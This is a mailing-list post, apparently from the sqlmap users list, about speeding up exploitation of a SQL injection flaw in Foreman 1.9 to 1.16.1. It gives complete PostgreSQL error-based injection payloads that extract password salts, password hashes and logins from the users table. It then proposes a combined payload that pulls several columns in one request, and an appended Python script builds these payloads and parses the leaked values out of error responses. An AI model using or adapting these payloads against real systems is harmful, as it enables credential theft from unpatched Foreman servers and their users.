I’m currently exploiting a recent vulnerability announced in Foreman versions 1.9+ through 1.16.1. The available techniques are boolean, time, and error-based.
Error-based is the fastest, obviously, but it seems like it could be faster. Currently, it performs an error-based exfil in a similar way to how MySQL error-based injections are done, which is a single value at a time. IIRC, MySQL errors get truncated so that you generally can’t exfil more than 50 or so characters at a time, so this strategy makes sense in those cases. However, PostgreSQL errors that are bubbled up don’t (seem to) have this limitation and will return very lengthy error messages. Currently, sqlmap will grab a value per column per row per request. That looks like this:

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM public.users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

Each of these values takes a single request/response. But they could easily be combined into one, with each distinct value being pulled out with a regular expression:

widgets[16) AND 8137=CAST((CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_salt AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(password_hash AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(107)||CHR(120)||CHR(122)||CHR(113))||(SELECT COALESCE(CAST(login AS CHARACTER(10000)),(CHR(32))) FROM users ORDER BY id OFFSET 3 LIMIT 1)::text||(CHR(113)||CHR(98)||CHR(120)||CHR(113)||CHR(113)) AS NUMERIC)-- lsuo][col]=1

But there may be a reason sqlmap does this in the former way. Anyway, just my 2c.
_______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
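The combining step the post proposes, as an added example (this is neither sqlmap's code nor the poster's): it assembles the multi-column PostgreSQL error-based payload from the same pieces as the payloads quoted in the message, and then pulls each value back out of the error text with a regular expression. The injection context ("widgets[16) AND 8137=CAST(" ... "-- lsuo][col]=1"), the marker strings "qkxzq"/"qbxqq" and the reuse of the opening marker as the separator are taken from the post's own payloads; the function names and the sample error body are my own, and the body is constructed, not captured from a real Foreman instance. It assumes no extracted value itself contains a marker string, which is why the parser reports a failure rather than guessing when the value count does not match.

```python
import re

# Injection context copied from the payloads in the post. Everything outside the CAST is the
# application-specific wrapping, kept separate so the builder is not tied to it.
INJ_PREFIX = "widgets[16) AND 8137=CAST("
INJ_SUFFIX = " AS NUMERIC)-- lsuo][col]=1"

# Marker strings from the post: "qkxzq" opens the extracted text, "qbxqq" closes it.
# The post's combined payload reuses the opening marker as the separator between values.
MARK_OPEN = "qkxzq"
MARK_CLOSE = "qbxqq"


def chr_concat(s):
    """Render a literal as PostgreSQL CHR() concatenation, the way the post's payloads do."""
    return "(" + "||".join(f"CHR({ord(c)})" for c in s) + ")"


def column_expr(column, table, offset):
    """One scalar subquery per column in the post's shape; a NULL column becomes a single space."""
    return (f"(SELECT COALESCE(CAST({column} AS CHARACTER(10000)),(CHR(32))) "
            f"FROM {table} ORDER BY id OFFSET {offset} LIMIT 1)::text")


def build_payload(columns, table, offset, sep=MARK_OPEN):
    """Build one error-based payload carrying every requested column of one row.

    With a single column this reproduces the per-column payload sqlmap sent;
    with several columns it reproduces the combined payload proposed in the post.
    """
    parts = [chr_concat(MARK_OPEN)]
    for i, col in enumerate(columns):
        if i:
            parts.append(chr_concat(sep))
        parts.append(column_expr(col, table, offset))
    parts.append(chr_concat(MARK_CLOSE))
    return INJ_PREFIX + "||".join(parts) + INJ_SUFFIX


def parse_error(body, ncols, sep=MARK_OPEN):
    """Extract the values from the bubbled-up error text.

    Returns a list of ncols strings, or None when the markers are missing (for
    example a truncated message) or the value count is wrong (for example a
    value that contained the separator marker). Callers should fall back to
    the per-column request in that case rather than trust a partial split.
    """
    m = re.search(re.escape(MARK_OPEN) + r"(.*?)" + re.escape(MARK_CLOSE), body, re.S)
    if not m:
        return None
    values = m.group(1).split(sep)
    return values if len(values) == ncols else None


# Constructed response body (not a real capture): the shape of a PostgreSQL numeric cast
# error as the Ruby pg gem surfaces it, with three made-up column values between the markers.
SAMPLE_ERROR = (
    'PG::InvalidTextRepresentation: ERROR:  invalid input syntax for type numeric: '
    '"qkxzqc8f3e1a2qkxzq$2a$10$constructedhashvalueqkxzqadminqbxqq"'
)

if __name__ == "__main__":
    cols = ["password_salt", "password_hash", "login"]
    print(build_payload(cols, "users", 3))
    print(parse_error(SAMPLE_ERROR, len(cols)))
```

The builder emits exactly the strings quoted in the post (one request per column when given one column, the combined form when given three), so the only new moving part is the parser; the length check there is the safety valve the post alludes to, since a server that does truncate, or a value that happens to contain the marker, would otherwise hand back misaligned columns.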